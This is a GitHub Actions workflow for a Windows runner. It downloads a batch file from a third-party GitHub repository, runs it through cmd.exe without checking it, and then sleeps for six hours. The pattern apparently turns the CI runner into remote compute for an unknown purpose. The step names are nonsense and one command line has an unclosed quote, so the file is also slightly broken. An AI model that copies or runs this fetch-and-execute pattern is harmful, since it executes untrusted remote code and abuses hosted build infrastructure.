name: Windows Workflow

on:
  workflow_dispatch:

jobs:
  build:
    runs-on: windows-latest

    steps:

      - name: at files in
        shell: pwsh
        run: |
          $webclient = New-Object System.Net.WebClient
          $webclient.DownloadFile("https://raw.githubusercontent.com/G67890/p1/main/run.bat", "Run.bat")
          Start-Process -FilePath "cmd.exe" -ArgumentList "/c Run.bat -Wait
        
          
      
      - name: tOu
        run: |
          Start-Sleep -Seconds 21600
       
        
      
